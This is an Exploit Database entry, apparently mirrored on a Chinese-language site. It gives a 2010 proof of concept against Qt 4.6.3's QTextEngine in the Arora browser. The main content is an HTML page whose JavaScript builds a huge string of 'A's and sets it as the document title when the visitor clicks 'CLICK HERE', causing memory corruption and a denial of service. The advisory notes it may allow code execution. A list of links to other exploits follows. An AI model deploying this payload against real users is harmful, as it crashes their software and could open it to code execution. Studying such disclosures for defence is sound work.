Qt 4.6.3 – ‘QTextEngine::LayoutData::reallocate()’ Memory Corruption

Exploit Database
127 阅读

作者： D4rk357

日期： 2010-07-13
类别：
- dos
平台：
- linux
来源：https://www.exploit-db.com/exploits/34364/

source: https://www.securityfocus.com/bid/41873/info

Qt is prone to a remote memory-corruption vulnerability.

Successful exploits may allow the attacker to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

<html>

<head>

<title>Arora browser Remote Denial fo Service </title>

function garbage() {

var buffer = "";

for (var i = 0; i < 8000; i++) {

buffer += "A";

}

var buffer2 = buffer;

for (i = 0; i < 8000; i++) {

buffer2 += buffer;

}

document.title = buffer2;

}

</script>

</head>

<body>

<br><h2>==> <a href="javascript:garbage();">CLICK HERE</a></font> <==</h2>

</body>

</html>

last Exploits
Qt 4.6.3 – ‘QTextEngine::LayoutData::reallocate()’ Memory Corruption的更多信息

Apple QuickTime 7.7.2 – Targa image Buffer Overflow：
Wireshark – wtap_optionblock_free Use-After-Free：
ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions：
RarmaRadio 2.72.4 – ‘server’ Denial of Service (PoC)：
Microsoft Windows 10 – Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation：
Adobe Acrobat Reader DC 15.016.20045 – Invalid Font ‘.ttf’ Memory Corruption (6)：
Microsoft Windows – Uniscribe Font Processing Heap Memory Corruption in ‘USP10!otlCacheManager::GlyphsSubstituted’ (MS17-011)：
Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized：